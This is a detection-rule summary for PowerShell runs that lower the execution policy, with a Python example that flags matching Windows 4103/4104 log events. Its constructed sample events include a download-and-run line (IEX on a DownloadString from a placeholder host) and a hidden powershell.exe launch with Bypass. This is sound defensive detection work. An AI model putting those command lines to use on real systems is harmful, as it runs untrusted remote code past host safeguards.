
Summary
This detection rule identifies PowerShell executions that specify a permissive execution policy: Unrestricted, Bypass, or RemoteSigned. Execution policy controls whether PowerShell will load scripts that are unsigned or were downloaded from the internet, and an attacker who passes -ExecutionPolicy Bypass on the powershell.exe command line, or calls Set-ExecutionPolicy from within a script, can run arbitrary code without satisfying the host's signing requirements. Microsoft documents execution policy as a safety feature rather than a security boundary, so an attempt to lower it is best read as an indicator of intent rather than as a defeated control. The rule uses Windows Event Codes 4103 (module logging, whose ContextInfo field includes the host application command line) and 4104 (script block logging, which records the executed script text) from the Microsoft-Windows-PowerShell/Operational log; both event types must be enabled through Group Policy before they are generated. It filters for events in which one of these policies is specified and excludes activity whose script path lies within trusted directories, since administrative tooling in those locations commonly sets a policy as part of normal operation. Because RemoteSigned is the default policy on Windows Server and appears in many legitimate scripts, matches should be reviewed alongside the parent process and script location before escalation. Tracking this activity helps analysts surface techniques used by threat actors such as UNC4990 (associated with the Rhysida group) to execute their tooling, and strengthens detection of scripting-based attacks that leverage PowerShell.
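As an added illustration, not the rule's own search logic and not Splunk's code, the Python below applies the same idea to a handful of constructed 4103/4104 records: it looks for Unrestricted, Bypass, or RemoteSigned following the -ExecutionPolicy switch (including the -ex... and -ep abbreviations powershell.exe accepts) or a Set-ExecutionPolicy call, recovers the script path from the event's Path field or its -File argument, and suppresses hits whose path normalises to an assumed trusted directory. The sample events, the trusted-directory list, and the field names are assumptions made here; the summary does not enumerate the rule's trusted directories.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Constructed sample events (not real telemetry). Field names follow the
# Microsoft-Windows-PowerShell/Operational log: 4103 carries the host
# application command line inside ContextInfo; 4104 carries ScriptBlockText
# and, when the block came from a file, its Path.
SAMPLE_EVENTS: List[Dict] = [
    {"EventCode": 4104, "Path": r"C:\Users\alice\AppData\Local\Temp\update.ps1",
     "ScriptBlockText": "Set-ExecutionPolicy Bypass -Scope Process -Force; "
                        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"EventCode": 4103, "Path": "",
     "ContextInfo": "Host Application = powershell.exe -nop -w hidden "
                    r"-ExecutionPolicy Bypass -File C:\Users\Public\s.ps1"},
    {"EventCode": 4103, "Path": "",
     "ContextInfo": r"Host Application = powershell.exe -ep Unrestricted -File C:\ProgramData\task.ps1"},
    {"EventCode": 4104, "Path": r"C:\Program Files\Vendor\install.ps1",
     "ScriptBlockText": r"powershell.exe -ExecutionPolicy RemoteSigned -File .\helper.ps1"},
    {"EventCode": 4104, "Path": r"C:\Users\bob\Documents\report.ps1",
     "ScriptBlockText": "Get-Process | Export-Csv report.csv"},
    {"EventCode": 4688, "Path": "", "ContextInfo": "powershell.exe -ExecutionPolicy Bypass"},
]

# Assumed allow-list for this example; the rule summary does not list its trusted directories.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# -ExecutionPolicy and the abbreviations powershell.exe accepts (-ex..., -ep),
# plus the positional Set-ExecutionPolicy <policy> form inside a script block.
POLICY_RE = re.compile(
    r"(?i)(?:set-executionpolicy|-ex\w*|-ep)\s+(unrestricted|bypass|remotesigned)\b")
# -File / -f argument, used to recover a script path from a 4103 host application line.
FILE_RE = re.compile(r'(?i)-f(?:ile)?\s+"?([^"\s]+)')


@dataclass
class Finding:
    event_code: int
    policy: str
    script_path: str
    evidence: str


def in_trusted_dir(path: str) -> bool:
    """True if the normalised path sits under an assumed-trusted directory.

    ntpath.normpath collapses '..' segments, so 'C:\\Program Files\\..\\Users\\x.ps1'
    is not treated as trusted; a bare prefix check would be fooled by it.
    """
    if not path:
        return False
    norm = ntpath.normpath(path).lower()
    return any(norm.startswith(d) for d in TRUSTED_DIRS)


def script_path(event: Dict, text: str) -> str:
    """Prefer the event's Path field; otherwise pull the -File argument from the text."""
    if event.get("Path"):
        return event["Path"]
    m = FILE_RE.search(text)
    return m.group(1) if m else ""


def detect(events: Iterable[Dict]) -> List[Finding]:
    """Return 4103/4104 events that request a permissive policy outside trusted directories."""
    hits: List[Finding] = []
    for ev in events:
        if ev.get("EventCode") not in (4103, 4104):
            continue
        text = ev.get("ScriptBlockText") or ev.get("ContextInfo") or ""
        m = POLICY_RE.search(text)
        if not m:
            continue
        path = script_path(ev, text)
        if in_trusted_dir(path):
            continue
        hits.append(Finding(ev["EventCode"], m.group(1).lower(), path, text))
    return hits


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.event_code}] policy={f.policy:<12} path={f.script_path or '<none>'}")
```

Run against the constructed records, the first three events are reported and the fourth is not: its RemoteSigned request comes from a script under Program Files, which is the trusted-directory exclusion the summary describes. Note that a 4104 record only contains a command line if the script itself launches another PowerShell instance; the -ExecutionPolicy switch passed to the original powershell.exe shows up in the 4103 host application field, which is why both event codes are needed.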
Categories
- Endpoint
- Windows
Data Sources
- Process
- Application Log
- Command
ATT&CK Techniques
- T1059.001
Created: 2024-02-09